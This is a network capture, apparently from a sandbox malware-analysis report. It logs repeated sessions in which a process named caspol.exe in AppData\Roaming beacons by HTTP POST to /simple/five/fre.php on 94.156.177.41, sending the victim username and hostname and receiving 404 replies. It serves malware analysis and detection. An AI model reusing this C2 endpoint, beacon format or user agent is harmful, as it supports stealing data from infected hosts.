                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    52192.168.2.224922194.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:48.532846928 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:48.537909031 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:49.387171030 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:49 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    53192.168.2.224922294.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:49.532310009 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:49.537252903 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:50.396709919 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:50 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    54192.168.2.224922394.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:50.536369085 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:50.541403055 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:51.399991989 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:51 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    55192.168.2.224922494.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:51.545281887 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:51.550184965 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:52.414423943 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:52 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    56192.168.2.224922594.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:52.566518068 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:52.571474075 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:53.412801027 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:53 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    57192.168.2.224922694.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:53.560519934 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:53.565464020 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:54.297231913 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:54 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    58192.168.2.224922794.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:54.453720093 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:54.459147930 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:55.163341045 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:55 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    59192.168.2.224922894.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:55.311486006 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:55.316399097 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:56.037281036 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:55 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    60192.168.2.224922994.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:56.186849117 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:56.191792965 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:56.912216902 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:56 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    61192.168.2.224923094.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:57.051752090 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:57.056886911 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:57.913125992 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:57 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    62192.168.2.224923194.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:58.058877945 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:58.063832045 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:58.906354904 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:58 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    63192.168.2.224923294.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:57:59.309000969 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:59.315018892 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:00.178472996 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:00 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    64192.168.2.224923394.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:00.401304960 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:00.406323910 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:01.249268055 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:01 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    65192.168.2.224923494.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:01.397597075 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:01.402549982 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:02.252270937 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:02 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    66192.168.2.224923594.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:02.405973911 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:02.410938978 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:03.142828941 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:03 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    67192.168.2.224923694.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:03.276879072 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:03.281827927 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:04.012312889 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:03 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    68192.168.2.224923794.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:04.148475885 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:04.153650999 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:05.015336037 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:04 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    69192.168.2.224923894.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:05.165608883 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:05.170720100 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:05.888010025 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:05 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    70192.168.2.224923994.156.177.41802596C:\Users\user\AppData\Roaming\caspol.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 20, 2024 07:58:06.037022114 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:58:06.042036057 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:58:06.878705025 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:58:06 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


